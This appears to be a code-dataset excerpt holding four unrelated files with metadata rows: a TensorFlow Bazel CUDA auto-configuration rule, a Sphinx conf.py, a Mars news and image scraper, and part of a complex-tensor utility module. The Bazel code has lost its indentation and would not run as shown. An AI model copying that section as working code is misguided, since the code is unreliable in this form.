if repository_ctx.path(alt_lib_dir).exists:
return alt_lib_dir
auto_configure_fail("Cannot find %s or %s under %s" %
(symlink_files.cuda_dnn_lib, symlink_files.cuda_dnn_lib_alt,
cudnn_install_basedir))
def _cudart_static_linkopt(cpu_value):
"""Returns additional platform-specific linkopts for cudart."""
return "" if cpu_value == "Darwin" else "\"-lrt\","
def _get_cuda_config(repository_ctx):
"""Detects and returns information about the CUDA installation on the system.
Args:
repository_ctx: The repository context.
Returns:
A struct containing the following fields:
cuda_toolkit_path: The CUDA toolkit installation directory.
cudnn_install_basedir: The cuDNN installation directory.
cuda_version: The version of CUDA on the system.
cudnn_version: The version of cuDNN on the system.
compute_capabilities: A list of the system's CUDA compute capabilities.
cpu_value: The name of the host operating system.
"""
cpu_value = _cpu_value(repository_ctx)
cuda_toolkit_path = _cuda_toolkit_path(repository_ctx)
cuda_version = _cuda_version(repository_ctx, cuda_toolkit_path, cpu_value)
cudnn_install_basedir = _cudnn_install_basedir(repository_ctx)
cudnn_version = _cudnn_version(repository_ctx, cudnn_install_basedir, cpu_value)
return struct(
cuda_toolkit_path = cuda_toolkit_path,
cudnn_install_basedir = cudnn_install_basedir,
cuda_version = cuda_version,
cudnn_version = cudnn_version,
compute_capabilities = _compute_capabilities(repository_ctx),
cpu_value = cpu_value)
def _tpl(repository_ctx, tpl, substitutions={}, out=None):
if not out:
out = tpl.replace(":", "/")
repository_ctx.template(
out,
Label("//third_party/gpus/%s.tpl" % tpl),
substitutions)
def _file(repository_ctx, label):
repository_ctx.template(
label.replace(":", "/"),
Label("//third_party/gpus/%s.tpl" % label),
{})
_DUMMY_CROSSTOOL_BZL_FILE = """
def error_gpu_disabled():
fail("ERROR: Building with --config=cuda but TensorFlow is not configured " +
"to build with GPU support. Please re-run ./configure and enter 'Y' " +
"at the prompt to build with GPU support.")
native.genrule(
name = "error_gen_crosstool",
outs = ["CROSSTOOL"],
cmd = "echo 'Should not be run.' && exit 1",
)
native.filegroup(
name = "crosstool",
srcs = [":CROSSTOOL"],
output_licenses = ["unencumbered"],
)
"""
_DUMMY_CROSSTOOL_BUILD_FILE = """
load("//crosstool:error_gpu_disabled.bzl", "error_gpu_disabled")
error_gpu_disabled()
"""
def _create_dummy_repository(repository_ctx):
cpu_value = _cpu_value(repository_ctx)
# Set up BUILD file for cuda/.
_tpl(repository_ctx, "cuda:build_defs.bzl",
{
"%{cuda_is_configured}": "False",
"%{cuda_extra_copts}": "[]"
})
_tpl(repository_ctx, "cuda:BUILD",
{
"%{cuda_driver_lib}": _lib_name("cuda", cpu_value),
"%{cudart_static_lib}": _lib_name("cudart_static", cpu_value,
static=True),
"%{cudart_static_linkopt}": _cudart_static_linkopt(cpu_value),
"%{cudart_lib}": _lib_name("cudart", cpu_value),
"%{cublas_lib}": _lib_name("cublas", cpu_value),
"%{cusolver_lib}": _lib_name("cusolver", cpu_value),
"%{cudnn_lib}": _lib_name("cudnn", cpu_value),
"%{cufft_lib}": _lib_name("cufft", cpu_value),
"%{curand_lib}": _lib_name("curand", cpu_value),
"%{cupti_lib}": _lib_name("cupti", cpu_value),
"%{cuda_include_genrules}": '',
"%{cuda_headers}": '',
})
# Create dummy files for the CUDA toolkit since they are still required by
# tensorflow/core/platform/default/build_config:cuda.
repository_ctx.file("cuda/include/cuda.h", "")
repository_ctx.file("cuda/include/cublas.h", "")
repository_ctx.file("cuda/include/cudnn.h", "")
repository_ctx.file("cuda/extras/CUPTI/include/cupti.h", "")
repository_ctx.file("cuda/lib/%s" % _lib_name("cuda", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("cudart", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("cudart_static", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("cublas", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("cusolver", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("cudnn", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("curand", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("cufft", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("cupti", cpu_value))
# Set up cuda_config.h, which is used by
# tensorflow/stream_executor/dso_loader.cc.
_tpl(repository_ctx, "cuda:cuda_config.h",
{
"%{cuda_version}": _DEFAULT_CUDA_VERSION,
"%{cudnn_version}": _DEFAULT_CUDNN_VERSION,
"%{cuda_compute_capabilities}": ",".join([
"CudaVersion(\"%s\")" % c
for c in _DEFAULT_CUDA_COMPUTE_CAPABILITIES]),
"%{cuda_toolkit_path}": _DEFAULT_CUDA_TOOLKIT_PATH,
})
# If cuda_configure is not configured to build with GPU support, and the user
# attempts to build with --config=cuda, add a dummy build rule to intercept
# this and fail with an actionable error message.
repository_ctx.file("crosstool/error_gpu_disabled.bzl",
_DUMMY_CROSSTOOL_BZL_FILE)
repository_ctx.file("crosstool/BUILD", _DUMMY_CROSSTOOL_BUILD_FILE)
def _execute(repository_ctx, cmdline, error_msg=None, error_details=None,
empty_stdout_fine=False):
"""Executes an arbitrary shell command.
Args:
repository_ctx: the repository_ctx object
cmdline: list of strings, the command to execute
error_msg: string, a summary of the error if the command fails
error_details: string, details about the error or steps to fix it
empty_stdout_fine: bool, if True, an empty stdout result is fine, otherwise
it's an error
Return:
the result of repository_ctx.execute(cmdline)
"""
result = repository_ctx.execute(cmdline)
if result.stderr or not (empty_stdout_fine or result.stdout):
auto_configure_fail(
"\n".join([
error_msg.strip() if error_msg else "Repository command failed",
result.stderr.strip(),
error_details if error_details else ""]))
return result
def _norm_path(path):
"""Returns a path with '/' and remove the trailing slash."""
path = path.replace("\\", "/")
if path[-1] == "/":
path = path[:-1]
return path
def _symlink_genrule_for_dir(repository_ctx, src_dir, dest_dir, genrule_name,
src_files = [], dest_files = []):
"""Returns a genrule to symlink(or copy if on Windows) a set of files.
If src_dir is passed, files will be read from the given directory; otherwise
we assume files are in src_files and dest_files
"""
if src_dir != None:
src_dir = _norm_path(src_dir)
dest_dir = _norm_path(dest_dir)
files = _read_dir(repository_ctx, src_dir)
# Create a list with the src_dir stripped to use for outputs.
dest_files = files.replace(src_dir, '').splitlines()
src_files = files.splitlines()
command = []
outs = []
for i in range(len(dest_files)):
if dest_files[i] != "":
# If we have only one file to link we do not want to use the dest_dir, as
# $(@D) will include the full path to the file.
dest = '$(@D)/' + dest_dir + dest_files[i] if len(dest_files) != 1 else '$(@D)/' + dest_files[i]
# On Windows, symlink is not supported, so we just copy all the files.
cmd = 'cp -f' if _is_windows(repository_ctx) else 'ln -s'
command.append(cmd + ' "%s" "%s"' % (src_files[i] , dest))
outs.append(' "' + dest_dir + dest_files[i] + '",')
genrule = _genrule(src_dir, genrule_name, " && ".join(command),
"\n".join(outs))
return genrule
def _genrule(src_dir, genrule_name, command, outs):
"""Returns a string with a genrule.
Genrule executes the given command and produces the given outputs.
"""
return (
'genrule(\n' +
' name = "' +
genrule_name + '",\n' +
' outs = [\n' +
outs +
' ],\n' +
' cmd = """\n' +
command +
' """,\n' +
')\n\n'
)
def _read_dir(repository_ctx, src_dir):
"""Returns a string with all files in a directory.
Finds all files inside a directory, traversing subfolders and following
symlinks. The returned string contains the full path of all files
separated by line breaks.
"""
if _is_windows(repository_ctx):
src_dir = src_dir.replace("/", "\\")
find_result = _execute(
repository_ctx, ["cmd.exe", "/c", "dir", src_dir, "/b", "/s", "/a-d"],
empty_stdout_fine=True)
# src_files will be used in genrule.outs where the paths must
# use forward slashes.
result = find_result.stdout.replace("\\", "/")
else:
find_result = _execute(
repository_ctx, ["find", src_dir, "-follow", "-type", "f"],
empty_stdout_fine=True)
result = find_result.stdout
return result
def _use_cuda_clang(repository_ctx):
if "TF_CUDA_CLANG" in repository_ctx.os.environ:
enable_cuda = repository_ctx.os.environ["TF_CUDA_CLANG"].strip()
return enable_cuda == "1"
return False
def _compute_cuda_extra_copts(repository_ctx, compute_capabilities):
if _use_cuda_clang(repository_ctx):
capability_flags = ["--cuda-gpu-arch=sm_" +
cap.replace(".", "") for cap in compute_capabilities]
else:
# Capabilities are handled in the "crosstool_wrapper_driver_is_not_gcc" for nvcc
capability_flags = []
return str(capability_flags)
def _create_local_cuda_repository(repository_ctx):
"""Creates the repository containing files set up to build with CUDA."""
cuda_config = _get_cuda_config(repository_ctx)
cudnn_header_dir = _find_cudnn_header_dir(repository_ctx,
cuda_config.cudnn_install_basedir)
# Set up symbolic links for the cuda toolkit by creating genrules to do
# symlinking. We create one genrule for each directory we want to track under
# cuda_toolkit_path
cuda_toolkit_path = cuda_config.cuda_toolkit_path
cuda_include_path = cuda_toolkit_path + "/include"
genrules = [_symlink_genrule_for_dir(repository_ctx,
cuda_include_path, "include", "cuda-include")]
genrules.append(_symlink_genrule_for_dir(repository_ctx,
cuda_toolkit_path + "/nvvm", "nvvm", "cuda-nvvm"))
genrules.append(_symlink_genrule_for_dir(repository_ctx,
cuda_toolkit_path + "/extras/CUPTI/include",
"extras/CUPTI/include", "cuda-extras"))
cuda_libs = _find_libs(repository_ctx, cuda_config)
cuda_lib_src = []
cuda_lib_dest = []
for lib in cuda_libs.values():
cuda_lib_src.append(lib.path)
cuda_lib_dest.append("lib/" + lib.file_name)
genrules.append(_symlink_genrule_for_dir(repository_ctx, None, "", "cuda-lib",
cuda_lib_src, cuda_lib_dest))
  # Set up the symbolic links for cudnn if cudnn was not installed to
# CUDA_TOOLKIT_PATH.
included_files = _read_dir(repository_ctx, cuda_include_path).replace(
cuda_include_path, '').splitlines()
if '/cudnn.h' not in included_files:
genrules.append(_symlink_genrule_for_dir(repository_ctx, None, "include/",
"cudnn-include", [cudnn_header_dir + "/cudnn.h"], ["cudnn.h"]))
else:
genrules.append(
'filegroup(\n' +
' name = "cudnn-include",\n' +
' srcs = [],\n' +
')\n'
)
# Set up BUILD file for cuda/
_tpl(repository_ctx, "cuda:build_defs.bzl",
{
"%{cuda_is_configured}": "True",
"%{cuda_extra_copts}": _compute_cuda_extra_copts(
repository_ctx, cuda_config.compute_capabilities),
})
_tpl(repository_ctx, "cuda:BUILD",
{
"%{cuda_driver_lib}": cuda_libs["cuda"].file_name,
"%{cudart_static_lib}": cuda_libs["cudart_static"].file_name,
"%{cudart_static_linkopt}": _cudart_static_linkopt(
cuda_config.cpu_value),
"%{cudart_lib}": cuda_libs["cudart"].file_name,
"%{cublas_lib}": cuda_libs["cublas"].file_name,
"%{cusolver_lib}": cuda_libs["cusolver"].file_name,
"%{cudnn_lib}": cuda_libs["cudnn"].file_name,
"%{cufft_lib}": cuda_libs["cufft"].file_name,
"%{curand_lib}": cuda_libs["curand"].file_name,
"%{cupti_lib}": cuda_libs["cupti"].file_name,
"%{cuda_include_genrules}": "\n".join(genrules),
"%{cuda_headers}": ('":cuda-include",\n' +
' ":cudnn-include",')
})
# Set up crosstool/
_file(repository_ctx, "crosstool:BUILD")
cc = find_cc(repository_ctx)
host_compiler_includes = _host_compiler_includes(repository_ctx, cc)
cuda_defines = {
"%{cuda_include_path}": _cuda_include_path(repository_ctx,
cuda_config),
"%{host_compiler_includes}": host_compiler_includes,
}
if _use_cuda_clang(repository_ctx):
cuda_defines["%{clang_path}"] = cc
_tpl(repository_ctx, "crosstool:CROSSTOOL_clang", cuda_defines, out="crosstool/CROSSTOOL")
else:
nvcc_path = str(repository_ctx.path("%s/bin/nvcc%s" %
(cuda_config.cuda_toolkit_path,
".exe" if cuda_config.cpu_value == "Windows" else "")))
_tpl(repository_ctx, "crosstool:CROSSTOOL_nvcc", cuda_defines, out="crosstool/CROSSTOOL")
_tpl(repository_ctx,
"crosstool:clang/bin/crosstool_wrapper_driver_is_not_gcc",
{
"%{cpu_compiler}": str(cc),
"%{cuda_version}": cuda_config.cuda_version,
"%{nvcc_path}": nvcc_path,
"%{gcc_host_compiler_path}": str(cc),
"%{cuda_compute_capabilities}": ", ".join(
["\"%s\"" % c for c in cuda_config.compute_capabilities]),
})
# Set up cuda_config.h, which is used by
# tensorflow/stream_executor/dso_loader.cc.
_tpl(repository_ctx, "cuda:cuda_config.h",
{
"%{cuda_version}": cuda_config.cuda_version,
"%{cudnn_version}": cuda_config.cudnn_version,
"%{cuda_compute_capabilities}": ",".join(
["CudaVersion(\"%s\")" % c
for c in cuda_config.compute_capabilities]),
"%{cuda_toolkit_path}": cuda_config.cuda_toolkit_path,
})
def _create_remote_cuda_repository(repository_ctx, remote_config_repo):
"""Creates pointers to a remotely configured repo set up to build with CUDA."""
_tpl(repository_ctx, "cuda:build_defs.bzl",
{
"%{cuda_is_configured}": "True",
"%{cuda_extra_copts}": _compute_cuda_extra_copts(
repository_ctx, _compute_capabilities(repository_ctx)),
})
_tpl(repository_ctx, "cuda:remote.BUILD",
{
"%{remote_cuda_repo}": remote_config_repo,
}, "cuda/BUILD")
_tpl(repository_ctx, "crosstool:remote.BUILD", {
"%{remote_cuda_repo}": remote_config_repo,
}, "crosstool/BUILD")
def _cuda_autoconf_impl(repository_ctx):
"""Implementation of the cuda_autoconf repository rule."""
if not _enable_cuda(repository_ctx):
_create_dummy_repository(repository_ctx)
else:
if _TF_CUDA_CONFIG_REPO in repository_ctx.os.environ:
_create_remote_cuda_repository(repository_ctx,
repository_ctx.os.environ[_TF_CUDA_CONFIG_REPO])
elif repository_ctx.attr.remote_config_repo != "":
_create_remote_cuda_repository(repository_ctx,
repository_ctx.attr.remote_config_repo)
else:
_create_local_cuda_repository(repository_ctx)
cuda_configure = repository_rule(
implementation = _cuda_autoconf_impl,
attrs = {
"remote_config_repo": attr.string(mandatory = False, default =""),
},
environ = [
_GCC_HOST_COMPILER_PATH,
"TF_NEED_CUDA",
_CUDA_TOOLKIT_PATH,
_CUDNN_INSTALL_PATH,
_TF_CUDA_VERSION,
_TF_CUDNN_VERSION,
_TF_CUDA_COMPUTE_CAPABILITIES,
_TF_CUDA_CONFIG_REPO,
],
)
"""Detects and configures the local CUDA toolchain.
Add the following to your WORKSPACE FILE:
```python
cuda_configure(
name = "local_config_cuda"
remote_config_repo = "@remote_cuda_config_tf//"
)
```
Args:
name: A unique name for this workspace rule.
remote_config_repo: Location of a pre-generated config (optional).
"""
| 38.155285 | 102 | 0.685667 |
c22e7d51fcf664ed54930eb8e3af70acc6a49a2b | 9,552 | py | Python | docs/conf.py | deprecated/nebulio | 8548d9f44117206e9314d676576b24c1bc5e1c76 | ["MIT"] | null | null | null | docs/conf.py | deprecated/nebulio | 8548d9f44117206e9314d676576b24c1bc5e1c76 | ["MIT"] | null | null | null | docs/conf.py | deprecated/nebulio | 8548d9f44117206e9314d676576b24c1bc5e1c76 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
#
# nebulio documentation build configuration file, created by
# sphinx-quickstart on Mon Aug 4 12:54:36 2014.
from __future__ import print_function
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# Not yet 06 Aug 2014
# from astropy.sphinx.conf import *
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode', 'numpydoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'nebulio'
copyright = u'2014, Author'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
import pkg_resources
try:
release = pkg_resources.get_distribution('nebulio').version
except pkg_resources.DistributionNotFound:
    print('To build the documentation, the distribution information of nebulio')
    print('has to be available. Either install the package into your')
    print('development environment or run "setup.py develop" to set up the')
    print('metadata. A virtualenv is recommended!')
sys.exit(1)
del pkg_resources
version = '.'.join(release.split('.')[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme_path = ["_themes"]
html_theme = 'bootstrap-astrowill'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'nebuliodoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'nebulio.tex', u'nebulio Documentation',
u'Author', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'nebulio', u'nebulio Documentation',
[u'Author'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'nebulio', u'nebulio Documentation',
u'Author', 'nebulio', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'nebulio'
epub_author = u'Author'
epub_publisher = u'Author'
epub_copyright = u'2014, Author'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
| 31.84 | 82 | 0.712207 |
6a64b6e43de0cc5c8260731e12577726d42db5c1 | 3,396 | py | Python | Mission-to-Mars/scrape_mars.py | tamerfa/Mission-to-Mars | 116e8dd63c9f3f2803eec723f50f57909216c7e6 | ["ADSL"] | null | null | null | Mission-to-Mars/scrape_mars.py | tamerfa/Mission-to-Mars | 116e8dd63c9f3f2803eec723f50f57909216c7e6 | ["ADSL"] | null | null | null | Mission-to-Mars/scrape_mars.py | tamerfa/Mission-to-Mars | 116e8dd63c9f3f2803eec723f50f57909216c7e6 | ["ADSL"] | null | null | null |
# Importing dependencies
from splinter import Browser
from bs4 import BeautifulSoup as bs
from webdriver_manager.chrome import ChromeDriverManager
import time
import pandas as pd
def scrape():
# Initiate browser
executable_path = {'executable_path':ChromeDriverManager().install()}
browser = Browser('chrome',**executable_path, headless=False)
# Defining a dictionary to collect all scraped data
mars_dict = {}
# Scraping 'Nasa Mars News' site
nasa_url = 'https://redplanetscience.com/'
browser.visit(nasa_url)
html = browser.html
soup = bs(html, 'html.parser')
news_title = soup.find('div', class_= 'content_title').text
news_p = soup.find('div', class_= 'article_teaser_body').text
# Adding 'Nasa Mars News' data to mars_dict
mars_dict['news_title'] = news_title
mars_dict['news_p'] = news_p
# Scraping 'JPL Mars Space Images' featured image
jpl_url = 'https://spaceimages-mars.com/'
browser.visit(jpl_url)
html = browser.html
soup = bs(html, 'html.parser')
featured_image = soup.find('img', class_= 'headerimage')
relative_image_url = featured_image['src']
featured_image_url = jpl_url+relative_image_url
# Adding JPL's 'featured_image_url' data to mars_dict
mars_dict['featured_image_url'] = featured_image_url
# Scraping 'Mars Facts' using pandas
facts_url = 'https://galaxyfacts-mars.com/'
tables_list = pd.read_html(facts_url)
# Required table is the first table in the list
table_df = tables_list[0]
table_df.columns = ['Description', 'Mars', 'Earth']
table_df.set_index('Description', inplace=True)
    # Convert the table to an html string
html_table = table_df.to_html()
html_table = html_table.replace('\n','')
html_table = html_table.replace('class="dataframe', 'class="table table-striped table-bordered')
html_table = html_table.replace('style="text-align: right;"', 'style="text-align: center;"')
# Adding 'Mars Facts' table to mars_dict
mars_dict['facts'] = html_table
# Scraping 'Mars Hemispheres'
hem_url = 'https://marshemispheres.com/'
browser.visit(hem_url)
html = browser.html
soup = bs(html, 'html.parser')
# Getting a list for the links to be clicked
clickables = soup.find_all('a', class_='itemLink product-item')
# clickables contain duplicate links, keep only the ones that contain text
links = []
for link in clickables:
if link.text:
links.append(link)
# Delete unneeded last element of links
links.pop()
# Defining a list to collect data
hemisphere_image_urls = []
for link in links:
hem_dict = {}
link_text = link.find('h3').text
hem_dict['title'] = link_text
#Click to visit the image page
browser.links.find_by_partial_text(link_text).click()
time.sleep(1)
html = browser.html
soup = bs(html, 'html.parser')
img_section = soup.find('div', class_='downloads')
hem_dict['img_url'] = hem_url + img_section.find('a', text='Sample')['href']
hemisphere_image_urls.append(hem_dict)
# Going back to the previous page
browser.back()
time.sleep(1)
browser.quit()
    # Adding 'Mars hemispheres' data to mars_dict
mars_dict['hemishperes'] = hemisphere_image_urls
return mars_dict
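# Minimal usage sketch (hypothetical; the Flask app that normally consumes scrape()
# is not part of this module):
if __name__ == "__main__":
    print(scrape())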
| 30.594595 | 100 | 0.673145 |
8c4ab07559fc72991a94c3b51d05f7cd777e9186 | 5,799 | py | Python | piqa/utils/complex.py | charltongroves/piqa | 63817eeda165563efe5adfc789295ec7908c0201 | ["MIT"] | null | null | null | piqa/utils/complex.py | charltongroves/piqa | 63817eeda165563efe5adfc789295ec7908c0201 | ["MIT"] | null | null | null | piqa/utils/complex.py | charltongroves/piqa | 63817eeda165563efe5adfc789295ec7908c0201 | ["MIT"] | null | null | null |
r"""Differentiable and JITable complex tensor API
"""
import torch
def complex(real: torch.Tensor, imag: torch.Tensor) -> torch.Tensor:
r"""Returns a complex tensor with its real part equal to \(\Re\) and
its imaginary part equal to \(\Im\).
$$ c = \Re + i \Im $$
Args:
real: A tensor \(\Re\), \((*,)\).
imag: A tensor \(\Im\), \((*,)\).
Returns:
The complex tensor, \((*, 2)\).
Example:
>>> x = torch.tensor([2., 0.7071])
>>> y = torch.tensor([0., 0.7071])
>>> complex(x, y)
tensor([[2.0000, 0.0000],
[0.7071, 0.7071]])
"""
return torch.stack([real, imag], dim=-1)
def real(x: torch.Tensor) -> torch.Tensor:
r"""Returns the real part of \(x\).
Args:
x: A complex tensor, \((*, 2)\).
Returns:
The real tensor, \((*,)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> real(x)
tensor([2.0000, 0.7071])
"""
return x[..., 0]
def imag(x: torch.Tensor) -> torch.Tensor:
r"""Returns the imaginary part of \(x\).
Args:
x: A complex tensor, \((*, 2)\).
Returns:
The imaginary tensor, \((*,)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> imag(x)
tensor([0.0000, 0.7071])
"""
return x[..., 1]
def conj(x: torch.Tensor) -> torch.Tensor:
r"""Returns the element-wise conjugate of \(x\).
$$ \bar{x} = \Re(x) - i \Im(x) $$
Args:
x: A complex tensor, \((*, 2)\).
Returns:
The conjugate tensor, \((*, 2)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> conj(x)
tensor([[ 2.0000, -0.0000],
[ 0.7071, -0.7071]])
"""
return x * torch.tensor([1., -1.]).to(x)
def turn(x: torch.Tensor) -> torch.Tensor:
r"""Returns the element-wise product of \(x\) with \(i\).
$$ i x = -\Im(x) + i \Re(x) $$
Args:
x: A complex tensor, \((*, 2)\).
Returns:
The turned tensor, \((*, 2)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> turn(x)
tensor([[-0.0000, 2.0000],
[-0.7071, 0.7071]])
"""
return complex(-imag(x), real(x))
def polar(r: torch.Tensor, phi: torch.Tensor) -> torch.Tensor:
r"""Returns a complex tensor with its modulus equal to \(r\)
and its phase equal to \(\phi\).
$$ c = r \exp(i \phi) $$
Args:
r: A tensor \(r\), \((*,)\).
phi: A tensor \(\phi\), \((*,)\).
Returns:
The complex tensor, \((*, 2)\).
Example:
>>> x = torch.tensor([2., 1.])
>>> y = torch.tensor([0., 0.7854])
>>> polar(x, y)
tensor([[2.0000, 0.0000],
[0.7071, 0.7071]])
"""
return complex(r * torch.cos(phi), r * torch.sin(phi))
def mod(x: torch.Tensor, squared: bool = False) -> torch.Tensor:
r"""Returns the modulus (absolute value) of \(x\).
$$ \left| x \right| = \sqrt{ \Re(x)^2 + \Im(x)^2 } $$
Args:
x: A complex tensor, \((*, 2)\).
squared: Whether the output is squared or not.
Returns:
The modulus tensor, \((*,)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> mod(x)
tensor([2.0000, 1.0000])
"""
x = x.square().sum(dim=-1)
if not squared:
x = torch.sqrt(x)
return x
def angle(x: torch.Tensor) -> torch.Tensor:
r"""Returns the angle (phase) of \(x\).
$$ \phi(x) = \operatorname{atan2}(\Im(x), \Re(x)) $$
Args:
x: A complex tensor, \((*, 2)\).
Returns:
The angle tensor, \((*,)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> angle(x)
tensor([0.0000, 0.7854])
"""
return torch.atan2(x[..., 1], x[..., 0])
def prod(x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:
r"""Returns the element-wise product of \(x\) and \(y\).
$$ x y = \Re(x) \Re(y) - \Im(x) \Im(y)
        + i \left( \Re(x) \Im(y) + \Im(x) \Re(y) \right) $$
Args:
x: A complex tensor, \((*, 2)\).
y: A complex tensor, \((*, 2)\).
Returns:
The product tensor, \((*, 2)\).
Example:
>>> x = torch.tensor([[2., 0.], [0.7071, 0.7071]])
>>> y = torch.tensor([[2., -0.], [0.7071, -0.7071]])
>>> prod(x, y)
tensor([[4.0000, 0.0000],
[1.0000, 0.0000]])
"""
x_r, x_i = x[..., 0], x[..., 1]
y_r, y_i = y[..., 0], y[..., 1]
return complex(x_r * y_r - x_i * y_i, x_i * y_r + x_r * y_i)
def dot(x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:
r"""Returns the element-wise dot-product of \(x\) and \(y\).
$$ x \odot y = \Re(x) \Re(y) + \Im(x) \Im(y) $$
Args:
x: A complex tensor, \((*, 2)\).
y: A complex tensor, \((*, 2)\).
Returns:
The dot-product tensor, \((*,)\).
Example:
